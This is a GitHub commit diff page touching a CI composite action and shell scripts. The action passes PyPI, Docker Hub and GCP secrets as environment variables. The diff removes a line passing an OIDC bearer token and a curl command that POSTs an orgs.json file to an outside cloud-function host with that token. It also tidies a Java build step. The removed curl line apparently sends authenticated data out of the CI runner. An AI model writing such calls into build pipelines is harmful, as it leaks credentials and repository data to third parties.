File tree Expand file tree Collapse file tree 3 files changed +2
-4
lines changed
actions/1-addition/2-feed Expand file tree Collapse file tree 3 files changed +2
-4
lines changed Original file line number Diff line number Diff line change @@ -123,7 +123,6 @@ runs:
123123 PYPI_TOKEN : ${{ inputs.pypi_token }}
124124 ACTOR : ${{ github.triggering_actor }}
125125 OWNER : ${{ github.repository_owner }}
126- BEARER : ${{ steps.auth.outputs.id_token }}
127126 DOCKER_HUB_TOKEN : ${{ inputs.hub_token }}
128127 DOCKER_HUB_PASSWORD : ${{ inputs.hub_password }}
129128 GCP_CREDENTIALS : ${{ inputs.credentials }}
Original file line number Diff line number Diff line change @@ -28,7 +28,6 @@ set_target() {
2828 if [[ " $i " -lt " ${# array[@]} -1" ]]; then echo " ," >> ${RUNNER_TEMP} /orgs.json; fi
2929 done
3030 echo " ]" >> ${RUNNER_TEMP} /orgs.json
31- curl -s -X POST https://us-central1-feedmapping.cloudfunctions.net/function -H " Authorization: Bearer ${BEARER} " -H " Content-Type: application/json" --data @${RUNNER_TEMP} /orgs.json | jq ' .' > ${RUNNER_TEMP} /gist.json
3231 fi
3332
3433 # Iterate the Structure
Original file line number Diff line number Diff line change @@ -78,8 +78,8 @@ if [[ "${JOBS_ID}" == "1" ]]; then
7878 fi
7979
8080 if [[ " ${RERUN_RUNNER} " != " false" ]]; then gh variable set RERUN_RUNNER --body " false" ; fi
81- cd $1 && javac -d user_data/ft_client/test_client javaCode/Main.java
82- cd ${GITHUB_WORKSPACE} && mv -f $1 /user_data . && ls -al .
81+ cd $1 && javac -d user_data/ft_client/test_client javaCode/Main.java && cd ${GITHUB_WORKSPACE}
82+ if [[ ! -d user_data ]] ; then mv -f $1 /user_data . && ls -al; fi
8383
8484 fi
8585
You can’t perform that action at this time.
0 commit comments